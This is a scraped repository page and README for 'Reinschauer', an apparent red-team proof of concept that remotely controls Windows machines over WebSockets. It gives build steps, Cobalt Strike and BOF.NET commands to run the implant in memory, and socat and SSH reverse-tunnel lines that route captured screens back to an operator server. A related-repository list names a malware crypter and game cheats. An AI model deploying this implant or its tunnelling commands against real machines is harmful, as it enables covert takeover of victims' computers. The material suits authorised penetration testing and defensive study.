• This repository has been archived on 31/Aug/2024
  • Stars
    star
    503
  • Rank 87,705 (Top 2 %)
  • Language
    C#
  • Created about 2 years ago
  • Updated almost 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

it is very good

Reinschauer

Hello

A PoC to remotely control Windows machines over Websockets. Check out my blog for a writeup.

Hello

  • Can be executed as Go exe, .NET/C# exe and in-memory using BOF.NET and Cobaltstrike.

Hello

  • Traffic can be tunneled via an interactive Beacon connection.
  • Other than most HVNC implementations, reinschauer converts raw bitmaps to JPEG and compresses the resulting data before sending it across the network to reduce frame size.
  • FPS and quality settings can be dynamically changed via the GUI. These affect the implant, so that network traffic is reduced. Dynamic scaling allows using this tool as an implant for machines with large screens.

Hello

  • Basic mouse and keyboard controls are possible.
  • You can use the script in the server folder to generate TLS server files or bring your own.
  • The server window can be resized freely, while click events shouldโ„ข be translated to the correct pixel on the target machine.
  • Use reinschauer-server -h for available options.

Protocol

+----------------------------------------------------------------------------------------+
|                                                                                        |
|                                                                                        |
|                  +----------------------------------------------------+                |
|                  |#1: Type (Binary or Text)                           |                |
|                  |    Binary: JPG Frame                               |                |
|                  |                                                    |                |
|                  |#2: Text                                            |                |
|                  |    ELO (Ping)                                      |                |
|                  |    FPS <FPS Count>                                 |                |
|                  |    SCL <Scaler Count>                              |                |
|                  |    QUL <JPG Quality>                               |                |
|                  |    LCL X Y (Left Click + Coordinates)              |                |
|                  |    RCL X Y                                         |                |
|                  |    KEY <Char>                                      |      xxxxxx    |
|       xxxxx   <--+----------------------------------------------------+--> xxxx   xx   |
|       x   xx                     Websockets via TLS                        xx       x  |
| x     xxxxxx                                                                xxxxxxxxx  |
| xxx     x   xx                                                          xx    x        |
|     xxxxxxxx                                                              xxxxx xxxxxx |
|         x                                                                   xxxxx      |
|         xx                                                                   xx        |
|         x xx                                                                 xxx       |
|        xx  xx                                                                x xx      |
|        x    xx                                                              xx  xxx    |
|       x      xx                                                             x     xx   |
|       x       x                                                            xx      x   |
+----------------------------------------------------------------------------------------+

FAQ

How to build?

  • Install a new version of golang, >=1.18
  • For debian-based distros: sudo apt -y install libx11-dev libxcursor-dev xorg-dev libgl1-mesa-dev
$ cd client && GOOS=windows GOARCH=amd64 go build
$ cd server && GOOS=linux GOARCH=amd64 go build

I've included a pre-built and standalone version of the dotnet variant in this repo. If you want to build it yourself, use the Visual Studio project file to build the x64 Release variant. If it doesn't happen automatically, download the required NuGet packages for the project via Visual Studio. Your target system most likely doesn't have these packages installed as well and therefore DLLs may be missing when executing the resulting exe on the target. To get around this, this project automatically invokes ILMerge.exe to bundle the resulting exe along with the required libraries. Therefore, use the generated file called reinschauer-dotnet-standalone.exe on targets.

You may have to go get stuff before. Use -ldflags -H=windowsgui to disable to console window.

Who's the client/server?

The client is executed on the target (Windows) machine. The server component is executed on the tester's (Linux) machine. It listens on 0.0.0.0:6969 by default. Both the Golang and C# client are compatible with the server.

Is this a HVNC / Hidden Desktop?

No. It uses the same Desktop as the user.

Some keys and key combinations do not work, pls fix

I know that |, @ and ยง might not work currently, at least on my german potato keyboard. Pls Fix.

The Client uses too much CPU Time

Using a lower FPS value may work.

I don't have a direct connection between client and server

You can use a CobaltStrike Beacon to tunnel traffic.

I don't have Cobaltstrike!

Use a socat redirector like:

socat TCP4-LISTEN:1337,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>

and start the client with the required parameters or hardcode them.

Notes Regarding BOF.NET and Cobaltstrike Usage

First, set up BOF.NET according to the manual. Also, load the standalone exe with bofnet_load <Path to Exe>. Then, decide how to use Reinschauer:

  1. You can tunnel the traffic across an active Beacon connection.
  2. You can send traffic to any other Internet-facing server

Tunnelling Traffic via Beacon

  • Set the session to interactive: sleep 0.
  • Set up remote port forwarding: rportfwd_local 6969 127.0.0.1 6969.
  • Execute Reinschauer in background: bofnet_job reinschauer_dotnet.BofStuff. This automatically causes Reinschauer to connect to 127.0.0.1:6969 on 127.0.0.1 of the target machine. This also deactivates TLS, since it uses the Beacon connection anyway.
  • To kill Reinschauer, use bofnet_jobkill <Job ID>.

Sending Traffic to Another Server

  • Execute Reinschauer in background: bofnet_job reinschauer_dotnet.BofStuff <Server IP> <Server Port> true. The boolean parameter enables TLS usage.
  • To kill Reinschauer, use bofnet_jobkill <Job ID>.

Then, use SSH and the GatewayPorts feature: Add GatewayPorts: clientspecified to sshd_config and restart the SSH server. Then, ssh -R '0.0.0.0:8080:localhost:6969'' [...] will make your local port 6969 available on 0.0.0.0:8080. Be careful :)

Or, set up a socat redirector on the Server:

socat TCP4-LISTEN:<Server Port>,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>

More Repositories

1

automotive-security-research

This repository contains reverse engineering results and resources for a few specific car models of a very specific car manufacturer. Please don't sue.
Python
84
star
2

haxxor-tools

Pentesting resources
Python
24
star
3

pwntools-r2

Launch radare2 like a boss from pwntools in tmux
Python
22
star
4

bananabot

A CS:GO Hack for Linux
C++
19
star
5

Crypt0r

A simple AES malware crypter
C++
16
star
6

jka-multihack

Multihack for the q3 based game Jedi Academy
C
9
star
7

pcap-mitm-fuzz0r

Fuzz servers and clients using pcaps or mitm based approaches
Python
9
star
8

endscene-hook

C++
8
star
9

awesome-talks

1337 content!
7
star
10

container-thesis

Master's thesis on Linux containers
7
star
11

borg-docker

Dockerized version of borg
Makefile
5
star
12

radare2-docker

Dockerized version of the reverse engineering tool radare2 (r2)
Makefile
5
star
13

getuser

Simple tool to log the username of the user that executed this .exe
C++
5
star
14

Dockerfiles

Some handy dockerfiles ๐ŸŒ
5
star
15

cutter-docker

Dockerized version of the reverse engineering tool cutter
Makefile
4
star
16

elodie-docker

Makefile
3
star
17

kali-docker

Kali in a box
Makefile
3
star
18

q3CvarUnlocker

Unlock cheat protected CVars in Q3 based games
C++
2
star
19

HassleTheHoff

Hasslehoff all the people - Set Hasslehoff as wallpaper via a script
Shell
2
star
20

hopper-docker

Dockerized version of the reverse engineering tool hopper (https://www.hopperapp.com/)
Makefile
2
star
21

r2-pwndebian-exploits

2
star
22

megabeets-rop-chain

Solution for https://www.megabeets.net/a-journey-into-radare-2-part-2/
Python
1
star
23

moneymanagerex-docker

Dockerized version of MoneyManager EX
Makefile
1
star
24

bibtex2pdf-docker

Download all references in a bibtex file
Python
1
star
25

nginx-reverse-proxy

A simple nginx reverse proxy using the official nginx docker image with custom port support, so you don't need subdomains.
HTML
1
star
26

monit-docker

Dockerized version of monit
Makefile
1
star
27

csgo-wallhack-noflash-nosmoke

yes
C++
1
star
28

pairprog-docker

Easy Remote Pair Programming Using Docker and Tmux
Makefile
1
star